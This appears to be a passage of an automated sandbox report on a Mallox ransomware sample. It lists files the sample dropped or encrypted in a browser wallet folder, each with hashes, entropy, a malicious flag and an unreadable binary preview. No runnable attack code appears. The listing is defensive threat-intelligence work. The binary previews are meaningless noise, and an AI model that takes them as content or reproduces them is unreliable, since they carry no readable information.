                    Preview:a..v...C.t~....."@/~........%.+R..;v.M..".R...8w5.....+..y...#..-q..K..U....;8..6........Z.f....j..o3.~.P8.5..+...-V......8{..+R..AJ.........B../.S&..C\.|..L.j^[3...>.....p]IA.F ..Dp..u.. ..f.P?.f.W...h..s|......_B0..=.c{...].*...E@.h.]...o.T....W.R)&:.`...._BV.L.h....#...:.ovg.J.M..f....I...".kn....r.w..~tX...A.r.Y.e....vlh...3.+A.sQ..)...] ...w.. .2L.XCK.....^2.d....Y.....[...k9.#l$O.'.NqW..'b\G...6..#...yPX.|(6..|-.ZC..ybN..hn..]F..OC.;...i..C.&.d.._T."....(l..RT...=N.w.`.-08....h1..o_..f.y.)......P.G...Z.<P.4....*...Y....o....-X.u.B..... ...P.ZH.9m...GU."....&.8.jC.Eu.O...C...B.T. 3...x.r.o.5]../.e......j.G("W8...6h../..@X.d..o.(^...C..S\.4l...f R.........,.@iN..cmR...uJ.........3.:.P.v..,o..E#..OO...N..F....2.I..(...)7I...G....j...@j..)U...A..z..c/V...K..`....D_...P#...~.W...M.xIH.X...:(...L.s...f....].9...3...O...aAH.&....r..`G...i.5.\9.....Il..|..&.B$.6..YQ.v..X.....6Hwe.9y...,A.~]#...).r.c.m...*.I..v...H.-kT.V.q.d.."....

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\driver-signature.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:OpenPGP Public Key
                    Category:dropped
                    Size (bytes):14451
                    Entropy (8bit):7.986712005961189
                    Encrypted:false
                    SSDEEP:384:/BJepEp6hgMlGlS4cAyPvMLqwo0ykT672aFbklc:2C63+30yOp
                    MD5:9A73AEB8C6ED04666B84FE2BD9E66130
                    SHA1:CFBEAC9E7AEA1D3BBCF107498CD4E23E0547BBC6
                    SHA-256:F1F5BCCE83AFA8EDD5212EDD6C2A0BE68207958804E78A62F37CED9CB7B140ED
                    SHA-512:24CD4853CDBD98E1992E7299BAE7765BF0FAC1224F32F21DCBFC31EB35D1FEED604D6B090B3FFF5E4190AE6FDA5471479BF02C2652DF94862BC016A56067BA8C
                    Malicious:false
                    Preview:..........|..|.2..D.{.I...).[u..RH.*.....Vx@.!E.&...?..*..n@.87.@%(.-.I.....*..Dq=B..<(4....[....T....Ja....)..0...H..o..xI.bK..q.Q3..^i\.....,....h..~..>.d=..-|=6.F...;...6.K.........7..w.C...b.W.e.w...N.60.n..._t.S).{..o..Uw........[w. ..`....}>+^....J..3....~..n....\{L..7%.u.K.G.Z....hD.....6b...(_.EY.....^a.+.#.....]Sf./c.~(.>.......K....fFR......l&..M<=.ClB_.....-7..r...'.v.f....z...]..G.DfE..\..S..~...\.E6.H.......X.g..w....\c..R..L....8@3\Q.......C...RA.-.=.c.o....X...a".....:Zx..e....362.....-S..t..0...y.'/....j...G..O(1..N........../VL.PUW.`..~n.~gn..CB.w.......FNy>.:.Y....?c...!.~LB./4."q.F`I..sF..:.#.k.w....,^"...9k.....R...oh...7.A..by..L.<.A'...&.....Wd.o.AfmR......K.Z.0.:%..&.xVJ.t.r\..r*C..d...t...~.\3.d}.m.}.....(.A.Bx..t..M..u.....L.T...R..%v...L6xg..+...`..asb...F.....:....`/...,....*.K\$.....^W../U...l.1e.. ...SMU......u!Vl.J9..".....A+.].MD.LTC.e+.&`.}.(U3..P.^.:..ro..>g...)..$2;rk&......37.p....M.s~r..

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\edge_driver.js

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1946134
                    Entropy (8bit):7.999918889315575
                    Encrypted:true
                    SSDEEP:49152:JveZpNGNZxCFg18h4bGHtQnPpbYwuVvLE4vB4cKNO:iNGNqGaYqQnPpbYBY4BCO
                    MD5:F15AE866EB952A8DB36F711D365AE481
                    SHA1:FA5A6C06CD44CF6321FABAEA3730B927D54ACF43
                    SHA-256:EDC320996CB4F2B5E476A7D9CC8E740D08FAD10F5EBE7D02DF744524C0F68141
                    SHA-512:92161CE4DA361D1EE602DB6F39DB8EC81877A07B9FB7DB88A4BE183B50DF403A14CE7A42763C06FB19A18E98ABDEC833174BABB6BF7DC79E1EE5F7198D4406A7
                    Malicious:true
                    Preview:.KSy...V9O^.w...k..AT.3_.h...^....R!..l.8..0nDB8....nvA8..R..Z.v&..f}.5..G....mB.0.!.G. ..#+.Gv...$...JUt...N.....G24...Le....LeKGzJ&.F..A.....G...L.?P..|sclE........Nf$F!.....e..a.+..:.q3tSC4...Ub).LS....-].J.-q.w'.)..D.uO.&V..B;..#C..._.=P/~..A.]t...k...:...`.E....n@Z!+...<......*3.k.;...h...s....c.x@.....cz...J......s..JO...&X..[t+)...Cg...;.Z.m.iL%.:cT.z'..c.....S.......9.....:.&..S.qA...lLC.i.m=.J. $.P.0.oI2...d.....F.*iv.(.4...5.:.<C...un4..7.......v...!.h<A.t..... 8..lD..[JQ .[N.....>....fmF~W.....Y.z.%:K.....:xT.-B...bU.......`...%..w%%..%7..]...\.e.....+..%.^,J......i..,^T....(.F/c&.......Mb.r.......s.'.;.`.I.w.....w..y....=.M...V...g7/......u.5.E| ..|.....v4..8.....:...l.....7|.r|:Q.y.-.H..IT..^.a. ..<.?..H..\...2...b..z.Z.33*_.6....e.75..;<E6E.../[......C.0..{.....R.-.d....v>.S...9.8.>...k...iM1.E...S.d.n?~..".~......G.d...8Bl..[P..ID5...+.fO......8..B[~&'~...k.b..hW.jD.V76...r......Sb./..T.......}.......i....._...G..*6..........X..

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ar\strings.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):18403
                    Entropy (8bit):7.9894086455801565
                    Encrypted:false
                    SSDEEP:384:MA6WEA4HsRduiUbzu4ZVm/zj2vJwXgfG23gkaMWb5+Zlf7JU4LyMv3KiYTC:B6Hund4ZVm/X2vJDfbKE3+TC
                    MD5:4F40759911FEF20C6BBDC81310037DE7
                    SHA1:5B8BA756905316B82E270A684D9908802F2A37AE
                    SHA-256:B28201684F95624938B6609EF099023BB6DA75BE78D21C4EA2DB59C006278987
                    SHA-512:33F886D9CF2C736A39A6CE7CF4690272BEDDD77F783314129CD475882799299F66815EB5FD4822C45FF722C11F51722670C75C075EAF48B4AF4CF4888078B6C5
                    Malicious:false
                    Preview:...vX.jw<.y....Vl..`R3a..c.0g67..4..o7`..../..y.=W.&..C..k.<z...E..V.....IZT..j.m....N.%.(..5.Nt..y...`..]..K7...9..\..@..4O.L.'$...2.e..Ae....8...F.lJt...2%:g....i"j.F\...z..W.@..h....[.E..Ru|L'z.*5..+.. ..E..N.I.uAq.).......G..-z4...F.......9.=........6..y..sQ.Zn...6....B..%....r4.z../.|.Me.j.V.$.@.D..^7...K.\..p....'...(..\.s.S..t..d...z.qG.g.O...pc..8......Xe..6H.4.N..D.Z....$......[..?.d.J.Z~R.n.}&F.f.A..].......[.k.~L.pQ....;..R..p...c...A......./...t..H.'......(...L(..3'......F.....t.../.o1..z.m*...g..N...H..A..:?.pl-....X.KZ%.Eq.]ry.s..|..}....-...z....n........^..............n....a...[...`...90..*\.....+..ct.[......6/.|y:2...9p`.g.`......]..._U..B~r..}....=.S1.!...]H..).....W5O..L=W......aoV.....s}.....S)/.N}b-..0...O.#y.#.6..Ji....k.........C4.I...*.}J...mr.?,...:.sX.x:.u...WU.t.Q4y..f."............W.r.`8Y#/Zb...rl.s......<..xP.;s... ....=. .....?8.DN..3R...c-.aI...#yd...`..Y......P{T...om.5.....[..hVS....B.3M.RB.I.[N

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\de\strings.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):15109
                    Entropy (8bit):7.9861275830347624
                    Encrypted:false
                    SSDEEP:192:iIJS3nlYdpfpdWvsX5R46ho1msEj58/e396CfFEpbilP5yG4IoyMiaCQC8DXX4MC:zglApdXR46ympFD6CGMyGxoyHQlHZwuY
                    MD5:7BF1268FAA4DB4EF0DE6C48A1F71F135
                    SHA1:8803F9723E4BFA9CC422B8D9099596114EC7E07A
                    SHA-256:4A7CC872068C0F381BA17D70F28D25967543521797FD72A255B4E8BBD00CB59E
                    SHA-512:7EF6CBFC4CB4436F068825CA3CF9C05FB2411A8C2E374E66CBD5978537513C2698D0A777C6BBFFF24DB5F3B6625EFBA58954829AB0079F29FC7C000EB503CDA3
                    Malicious:false
                    Preview:<.J....*.P.z-.y....w.f..&I...*.........G.g.?.i@.6.TBu\.F.GQ...l.).....`v...Kv......6.x....T.....l........o.D...6...J..O..u..L....a.._I.u...^l.=...c~`."....[.`Y...t..K.(.....f..q.&.....uUmC3..@.H.:r..!PG.-.9...pW)(...../.-._....kn.Zd..,.c.Q....6tZ...f.h.]c...urS...I.....8}....=...S.|g..X.ZI.T.J.g..;O....!...'..U..]....7.. e..F..Q..`#...........Q@.7.!..{.wx.p.x....k....B..Z3...S...}....Sw..Q.+@E./.~r.N...a<..S.p.(......B..&.]..._.../....V...$.|n8.>.9....if..Iu....6.+.k./.o.... .gO=7......M..DK.IXM(K[3.xn..v.D'..!...IP.K......k.\:\..P.....(\....E.|.ZO....a#,..f..f.2=l%.,..H.)@'H...z.F..(.2.<;..l..~......31mJp.L6.x.o,.#A.p.B......)...{.d/....K.....<.....h%......|..Up....O....Bz..&n.HE.7[:a;.r....7..Sd..._@.Hl7~.......qJ5.X.......kC...kV.!kh.....P."..Q.H...i...$...A...l.....q!...P..'..[.(.=6z..g0...e.R..=Pd.].....)..y@...h..3.;b{.*.|..mK.w...s.GD}S.......+...`.29F.s...|...a....S.............>.=<R%qK...O8.e{P....].......Y..fl.*.).&Q

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\en-GB\strings.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):13298
                    Entropy (8bit):7.98655694390807
                    Encrypted:false
                    SSDEEP:384:wq6hy2kyNIgjZZiqAUXhFk9zbGodL+snNRj6k5qFqU2Yf:wq72kyNgLUXhF2zbGoBnnj68qHh
                    MD5:C6EC8E8578321026860BA0A1E2E3DD6E
                    SHA1:0FF57143A9BCB7DDBE88E7742C18E20B819512F6
                    SHA-256:6C749ACB23F0C8162E8E132061EA431012DA6C15D2AC9FF5BBF9043547B9E1CE
                    SHA-512:4E25A471A9330DBBF04DD28E66202FE383F6CABB6B84EEDE43690E078793F04DFDC9A156FD7CFA74362DAAC3344571DD2178478F9AB223F831D9C6E9BD9153E2
                    Malicious:false
                    Preview:.W.'V...`...I|?O..5.2>q1(...{a.W.../......C^.}Cy./.....O.'........0b.......d.n.k.S..zm..U2..=.Z6...xf..f.D.H..2?.<........8N..\...pM.........l..!1$..J==..i.U.7......TJYRCy.;}._+.}.4.L.s_..u.F-.9..`9C..V{)..w....:.....&4?.B..%.........N.Z...?..._e.s...f...3..X..........3OM.w...(.....Q...@.R..P$3H..HyJo.e.g.w........8f8.W1G..'y..K...H......ys.._T....G..m.s.......Y.B.&"q9.....A.T..Xa:k:@M..)\.V...)....d..o.;..S#...1...........l.o.F.a.0|NN.Q.i....v....B..p.~..s..LK.....q. ....'.!...*.....!....4KJ+.O..+B..=...).'....(t4.C"....D...a..B.v..SE.RL...gV......)>.L...u.a...<U,...c6m`.r...vG.'....H.L.df.f@.&.V....u.e......}K.%...4.......&D.-.<.CP......7G.h..............4..PjU.,...@..@'i.b...[.....a.AH..z.X.....o...r."L.....++..........4.).:.w`.o.l.L.d....F.D....g...N.ursaa..<.L.B.}Y..A..f...eO..-o.4.5.....1B,....=..j..-.6K6..^.%.]..f:3D.....w_...n.F.p.Ej.>.c.;.+r...B.0._L3G..r.......sT.W.w....U...u.Z.....={.$Z..ae;:r...k..sl.B.....>.?..j......2

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\es\strings.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):14697
                    Entropy (8bit):7.988040003728086
                    Encrypted:false
                    SSDEEP:384:JiuUf5yZAevOyGjhZnWb6RWopSbmId63opOL2oTFQ/rc1Mi:JHUfkZAevOljhZnWbaW4Sbpd63yoIli
                    MD5:85765C4625161A21C00CAB5457731C57
                    SHA1:D44A874CB2FA3BE08AE066F8568E61FFFC11FE07
                    SHA-256:C30E82C1B991BCB51655AFF2B0301C89A8A40984918207B3F430A2DB2554DECC
                    SHA-512:4908E19AA17A75412A02694CA9165C67752A6EA16BB4423614175AFE3D7CB1B3806774ADFF687B4D8797135862B8E8A6F0D32D035292B5B8FC6184C5EADA3205
                    Malicious:false
                    Preview:.H...[...~. .g...-,Fy.c.:.r:..%...%]&...=....J.4Z\.;..O..b6-.^XNL..L..`..b.rK.{..j'r....."e.a_...E-7Co&.Il..^...N......t.x..S.<.4..N.V\.L-.T1.it...J...*m...7.h<.Xgy...2t)#..;.....$w.c..n{.?_. )..%M. .....(.=.....0?..t......O27...^.d..I..My.............>.h.....}L..F.[d8..p..Av.H.c..N..3..l..!..I5..1......T..y..B.1)@.x.@.......LnI.x5.t.j..a.AZ$.tv=..m..U..Y.^.......}.W..Gx.0.l....=...H...v.-....q.S.(...]Zkw.:F...S[V....n..s.?..g=.z.........K.:...K....-#O..b..._...Q.9b!..G...+^.......rF.H0..R..[..d.1#.....P.3..../..B.vZ.Z6x.T.....V. .^..7*.O...p.2....Wj{.......Ff.&...,JU.I....-.).Wl&......O:..MO...>G.Y....h.6~1.X/.|..\..b.....%....O>.(v....~...By.C19H--kj%....d.v...uW..5H.,..*.C...?"\.#"...o..,Bf....I.K,.-............=n.).. <wS.B...P....:Bv(..K.3i[..`0.......ib..0...K./.d.;...}....Q....H..V..n{..Y....ob...`?....j&z.\.I..VW.h.gV.L......d.\r..C....'.;.DT..-....Q.0...*./.0..ElO?ws..Zu....Q.{.....(.(..]^....J...&.bY.N0.dK....G.j..N....+....7..

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\fr-CA\strings.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:OpenPGP Secret Key
                    Category:dropped
                    Size (bytes):15677
                    Entropy (8bit):7.988115121568146
                    Encrypted:false
                    SSDEEP:384:k4eSjhl9As5PTNeHvC+t9y2M3+hSiJtf4A62KXr5kMVWjf2:kijhl9As5P5eP1thM3Jc8HFO2
                    MD5:EAF0A1C429A90DF5C14DA1B1381CED08
                    SHA1:6D1737DBCE584CEC4947A2903C3D25B5477D2525
                    SHA-256:0501885B56BD7159552AD401870AA9CB38291F38E55B0B823062965390BA3F6D
                    SHA-512:7C7B07D1A2AC578D4DA6A07A683688506CA1D96EEBAB43A15D8B578207DCC0A4C633DE47A0B0C350B5608AC4C7449924A6BC5723D5CFCB383E2F0651DDFFF2B6
                    Malicious:false
                    Preview:.P O......).U.*..G/.5^..k.US(F.F..T.@..3...l.#..'..dw6.m.}6J,.c....m.4(#..c...S.R.AP....i..J.z.tr_'..a.FR..[.....!C1j..nc s.E..I;.<4.Dst).V.K..h....*p.]].' Z.$.N..+U....T....$f.@..#.8\..k..?"q.......^x.M.A.r-.T...u.r.V.X.,2.z...^...3..,.P3..........*.S..s(..).+...L.I}[..]4..Z....6!...k...@.....e....?.....x;%y..<..F.........dw..<......%Y.O.Fy.#...A.I6..........vM02.PG..y..1.Z.E._...=.a.<...f.R.R.O.A...z.....%..u#.R..ov..n..{......!......K]?)..._..xD8....M....]u;R.P..N.,1.H.0.2yH.u.e..QT.5..e=y|..|F..|\Tt....Vm.a.x4..#.H.ON...gP.$./d]fg......`..xk%....Z.....e.6/.p..$..<.4[H.O..[..]..*.z....;....f|..q.|....}.#+.5.~.e5..~.v%.O....V?'.k.....b..}{.K.D.B......K..5.....R.RP'ms....w..p...C..U/a.0../h.F>.H]....1Qw.....N.l...h.Y/..99Ya....5.w.....k.=..a"y..8...a.nf.HsO..S..$..Ng....>N.Q..+..d..)O.9.r...8..?b..D....&$2...h..G.p.$.c..u. @...p...G...<bF.....v....d+1..r.......*~..Yu....W..%.....S>.1.......{<..s`r..&m............ ../-...c..D.D....p.

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\fr\strings.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):15669
                    Entropy (8bit):7.98790794082622
                    Encrypted:false
                    SSDEEP:384:4DcJ5KVf4rUa6yIuJSb03AG3d07aIz8xtPz:hcVtriozG34i
                    MD5:68E56027CA1B19BDFEF26EDA9A080F88
                    SHA1:0B38E032FD75D07C26429E10E8E9051B4CC157B6
                    SHA-256:C1D3E8C1F01CFD848CEA9CE161C9C7CDA234D618E3A5EF7477538EFAFA335308
                    SHA-512:9AF2EB51840A041B0F8915E995193226ACEBF5BE52894C1738D915F2FBE31256C176E0D408C739CD80457BB870EC764F75BFE97EECF752D65275F56B25327FE6
                    Malicious:false
                    Preview:J....$PH.H8..!.9.......Z....)?.(N_.J....|{G.{U........}.M.c-.!e.v.9U.0..."c...j..J>..$D....[.....CY..5.....E...........G}^..mL..H..r[.'..E.i....M..Ag.E.N..R.A...."..S7...C.$.e.f..3pOc.b.~...y......D0l.?Wu...m...;.e]3|..r...9.............+]/.M5..|U.3..5Z......Z1.}./..mGxk.UcAh.....7.\.f.vZ...i6........Tkb/....f.....@.1.h%#....dz.M....7.....g.....r...[...........U..za......B..VN...(& .yY.djA.)0......z....<=..>.. .....%.g...H..h.d4]]..`.........A.XR. .qU.i.c.l(..S.p_rA}...`*.`k%.."......!.j...jO.\.fyc...A.V...(`....F...a.O....(LgZ....^.l..U..dS..[......c..L..u#.........r.7@j...&{.G..K5.|.6....\t...i[......L+[.R7PI..~TC.zO.=bR[!k.....$...;^.Q...k.......j.b.f..Z.o.........5.F.Ub5..w.. .....].)kr+f...V.z....<. J....w.h=..U.!.....V............L.{YC9....?..NVY......-.... ....<!..G.Z..w...w..\.Y..BK......F.h.V..t..c.h...*..mS.....e....3)....!.L.w`....N....#RM.mp...+..$........?..7....ft....!.L..j./.l...M.Z.d~..-....u....I....25.{.\..&.s.

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\id\strings.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):14267
                    Entropy (8bit):7.9854253752476225
                    Encrypted:false
                    SSDEEP:384:LofyRWML0sBsKPVqTsVr3K4QQXWXBVbM8xDmhXxr0T0W:8fyRb0sBsvYVr64mXvTxyhBU0W
                    MD5:09F536311E2141B6B16DF74908D1C6BB
                    SHA1:73330481A42C2FF0AD0ED7BFF82006E8D5B6F3D4
                    SHA-256:9BDCB1DA27247E718A3FCA8916DE7BB42A4F7B6DF197C012D3123C847009C330
                    SHA-512:B0467B98A88F81AB2B2EB2564479B6C32F1DC12DF475A660D3105961E80434C27BE85AF7FAF9D5DA4A138FD960853A03A5119004205156A81007DA1714EA0EA3
                    Malicious:false
                    Preview:.R...Q..A9.|.....k)R\2#...e...u...i..o-.~..[.thM.bTH.g..%.'F.....~........&..V.F.<!../...=q.]...t.0.\.......A...cq.....y...X.v.D....7.n..#.odDQ.#dzL@W.3..1E$gXP.x....k.v..P'.W....Q...-...}7/.WI).....}...UO_..[~.").....h.s1:....R1..G..20..=>]..E....ma.g.[....^....R.......{._.Tz.^.).f.'....S.k._....i.}..*7..Hs.C#2.jd....|7{...p.....a..r9.&...3..BM....ii.8.X.6f.....{..I...n....j.6...../.P-.S...!OE.wvw......c..".:....7.U.':.....0........l..o9..&J[p<...-.}a.j......O(.%.o...D...k.!...D....;K.;`is..qd.AL...k2m.|....VP.&rC..........hA..f..ZqB..!.gI...F>..E..V...@\.._...Qy'%b...s....M..)..=....[GnA....M.j..E...PD.wD..1Q.1.=..o.0.......e.5..zM.q.v/..)..0....$n......z..X..1.n5.BkD.(>..=.......N...9T0.^.l...F...}.j..iJ.5{.....]F..\.!....*.~PK..L^(........Y....4.g.ql.#..9i.Z...ob...O.....M_.t..-.............L...Vt^.R.p.....c.p..."..oB5..].f..1#.gY..;d.S.O....L].y...;..|o....^........P2=V]...qA..l..O.].c'.L..7..H<$)...Y.6.G..7Cu....R'.[Y.....!....0p

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\it\strings.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):14701
                    Entropy (8bit):7.9856165423893914
                    Encrypted:false
                    SSDEEP:384:0jQdd11FwU5YE6GpbSN2fX8f2gjcg6TBV9HLty476:a411FwKJ6GXfsffjA5w476
                    MD5:37F3FAF8A8730D28BC22AF4DC6CAE644
                    SHA1:6FCA53296691FDEF98F0C953BB6F19F5C8E6FC83
                    SHA-256:868F2FAA958FAC436FA6134D53BD98E193B7301099ADAADBF9564EE7555F3426
                    SHA-512:1374D050D7F0FAFFD7C003801521BC7946F497152320F23FA04F7848D4572158277C2F7DB84E8B731CAD3E7B64CF67141748F902DBF93493A8F260358953588A
                    Malicious:false
                    Preview:..U.8...FO....S..}.'.P......g.$.^...hUh.H...~a...Wq.S.*T..Ee..^.o..\...k.x.....M..{[YhD'.&.w...o/.L.....k.W...O.7y.nD...u+3.?r7Y.v...MTV(....f.T.}j.]QI...:d..Y...nNj..-:7....Y].@5.G>?....D.R....... 1.9u..9.....wDY...2.[...."w)1.8....=.2.@P......Y....z].j...`.E.@.~.[..>...]w.....^^Pq..c's...c.yC.z..!..<c../..T...dpN...t@...U.ZYs.......+..R.b1=.dQ.....(..H.0O,....._".u....-.o.(...U1..5WbR-....A^..=R.dt......s^.?.....E../,.L9.t.?.5...."..@..d.p...r...i=.BK...'J.z..._.......u[H...Q.......U.}.LY..+.Bz..&...R.3..x!..Ab.......|..l{r.....`|...:..U.3.T........y..C.......u..%-.6+o...v../s.!..8.\W.... 0).-=.^....F2..\..M'f^|.y.~U..?S.Bb.....p.....R..(.....P6.Cq'.8...y.O^..k...Q...d........Q..Q.,.sy..L..Y...p.(....U..6....pz...%8.\`j.-.,...j|...%.3...).-..b...\...I.%6..R.....=.,B.Jl........B.l..U...;Q......@b...b..b'm...u...P.Ia.!...}|..<....N...........2.v... ..&-..u....:.....!52.s..~.c..{.M..f.....6........fr......v.a..F..\A..3 f............gp.R@..7t@...

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ja\strings.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):16985
                    Entropy (8bit):7.988631242005726
                    Encrypted:false
                    SSDEEP:384:xbFe+KbOkoVEFpaSRfag7T/kCHE1NV/osxWJH4giWEKDfRppYL5:WdomFQGfagT/diosYJH6UDZp0
                    MD5:BF8B9ACCE09B5BFC3DDE9E98E9A52D81
                    SHA1:C25D89F1580B384D63938BAD46CABC314FCD5A80
                    SHA-256:89C0E4CC266671ACF127DA0957A54A583E8602CA03109B3832161ADD44A40883
                    SHA-512:0EC6161C012C3E3579F31FA21D078C257FB097017F66C3E04AD6313DA940163A58BE724B3A93C0E218E6F02B7DAC0DD378B4642B1B850F4E267F0D608713A123
                    Malicious:false
                    Preview:...=.m..xp@T.?..pV.(....AkQ..y..nd.......0.E...../.9+x.\\S...!....+.Y.n..o.)^..Q.\.......o....p...l..(..(..Y...Z..?..."-c..z.W.L...j..2aADx.sQH......?...B..x8 .^|...XP2..:.U.B.".r..!L.....#.y.}..oJ.[:..0..Uv.%.DB......8.c...4.{]5=.....a}<.OR.y...I.8.e....'q...nM...:..(k.8t.r..?...5m..I...|...m.#[9\.m.... :..w...M&...e.=$K.pEY....Px3.o{..Vs....h,.2e...(.....#....G....t... ..Wq4.J.........\eR.o5..[..[....Y..R.Y.XC.uS*.%N'.'....S.....yg.....p...#..R....v)?.6.2|X......h~.U<_."...WwL\.....@-.".....9...0.....v.....d...2.I..@.R>)I..~.,..}q....p.].fe\...k%..1..^4".+..........:/..l._.I....{.1.D.......z/`..P.S.(.3().m..T:.....c).H.y.[.fv...u.;.......7o.....l.x.....{q..S.x....D....,...`./=........\..\.%.w..Zu%M.B....g..U....Y..n........@.}.s)..i_...ob....{E..S./-O...@E..WQ..}.]..v.!..$.;'....;.S)..[V.A.$1.......u*s...`.(..2.$...J...qVC-...y..k.../..."..n...}P.1.e....;8w......u....w.X..U|.....1.,F..xs..u...db.n.zf....lr8...J..'p..f*#..+..v.Gz....

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\nl\strings.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):14560
                    Entropy (8bit):7.986995831209214
                    Encrypted:false
                    SSDEEP:384:4s/YFSAIj8aXGl//WAShJB2oI5QXG3w2DRemw4NS+s/BsW/n+0L6:rEI4aXGEASh2o2QXG3wgrlIbO
                    MD5:A318B2B9B77E3275C86DA393F682A459
                    SHA1:8D5081DEA0139352B851EE2C96384230288D4755
                    SHA-256:6834ABE3A1817AE005EB15947AEBCD99AB3E4BC39F187FE9AF1BF7700FEABA56
                    SHA-512:68CA1E925ADD49844CFF4A70D3C73584A48B66814DEA62130F5621D37703B796CE08BA91A5149A98E87A657763EE1825CC3B14FA0FC27E2850F903753A75D706
                    Malicious:false
                    Preview:...DX.n....VE.|.k...#Ag.........Qka.....N*<x..I.....l..M..;..U...4o.KSL...R..ZdX.O.....rT.f.m.1...|.e.e...C.0.,...8 o...msu]u{`.\l.@a.6..++..8.^:..j..n.<...4Y.(..[.vGg..~"&0..l.#...#.<..K...j...Ok@.h...uM....C.q....&K...pH.Z.$..'....:b..<.....Y..k...P....4.G...]...l.f90......_..e..: (U.x#*...5......Ak&D..Mo..!.........La&..9...@Z.6.......V..d..YH....4LQ.....Y...(.z[^.....Q..*_..T.~.Ho.k....y`.,.m.Bs.......@%...m.z=........M...%.$Xp..&2.]Tv.<.[./...9|&>`)...r.Sc..ELX....`.......Vd.././...kR.k.....1.e~(..=.....v...Y/..T...T....`.4j.y..S.%..C..~...W}6G.r..8....D..>...t.n....*.8..-.....!/%...0......?.E...>..R...}...q...).!od........Ld.$=>.8.........:8.}...W..Ey.;.....*.et..N..;........R.f...|...l.n.r?m.....N..!...[sf...n..R.....ha...u}y.+;..p........N..DK........VZ..i..r....d....Dnk..]|.Y.v.....6^.....8c*.j......q<....k...0.z.C..{.W..#`...85R..n.....U.H3n.Z[0...`....+..e7.0..A.(.iJ|[.<_:.............5...[.k.'?E>......W\..|W...Rl.@<

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\pt-BR\strings.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):14543
                    Entropy (8bit):7.986436403251446
                    Encrypted:false
                    SSDEEP:384:jKDifoS7Qukv1hULS0tsap6nfdpPApyu1AXfECz+xUW8Ud:uDZoInULS0tsNZu1AEG+x3
                    MD5:17B5E46950AB6DD26E64043C309D4246
                    SHA1:B505C4B1D0F805F6A9F47BE15A48890479F96483
                    SHA-256:ACD8BD6918AF9C5C75B4129C26811FA3AE7C8AD26ACEF6377518F585A3BFB06C
                    SHA-512:DDB4DCBFB35F1DB9C3E30F9E6463036969DDD24DDEEE4963125082F9B29A03AA323AA51B3F24B59B28194E7C1C74E68AF040BABF22DE101C264620829422F3DA
                    Malicious:false
                    Preview:k...s|.:.MB.d.4.7.b6...x_....b...'..m.qi[s...Hq.D7...[..-..c....9..e...{.um..7..bV@...F...v].s....D.....b..][._. H._x...2...b.oG.b"....%x........d.N..HHrx.je~'?R.(..lH..'.>....e.@H>.SQ.}....B....P.E'B...u......U....(.Li.|N..j.B..Y.E~..`.d.2..vqC^...<..!67I.... ......W..T....~..y,HG............=w..P&|.x`...l.P..{h5.......4.....=+|.B*.....`C...Zl."...]./...=%...~.<....../-=./o3Y.H.....pU....?.tW..a.O..8l....yc....v`.....W...as..8.mR.l .4..Ty...M..du$.]P...5...8....G..KS...].'....{...E..v.~2...sKM.!9.._#...[EU[.f.u/w..."..q#:..1~...b].s.OVC...[.p.*..6..._..>3..@;.(So.Z%T...C...e.;Sg2z?...L..t6....N.}..vdL.a.......N6.V7,.!.p...d..8A.'.<....K.x..4....^...7.............+...z..m.J.(.1.c....8Hf.99..).~Z.eC..w...g.....rO>..ku..-.#.C'...\.U.Mv.....zR...C..`r.[[5U.`...9O.P......U.5a...u2..5.......c..6.Nk#S.p..K.<2.Q....(:..zc...6'#...cw..y.g\.....i2,p......`.. O..0?....D..2...._Q..]pb9.....e....!..c..1c......V.....g?s..o.q8x.f........P3.(.w...yyw+.U

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\pt-PT\strings.json

                    Download File
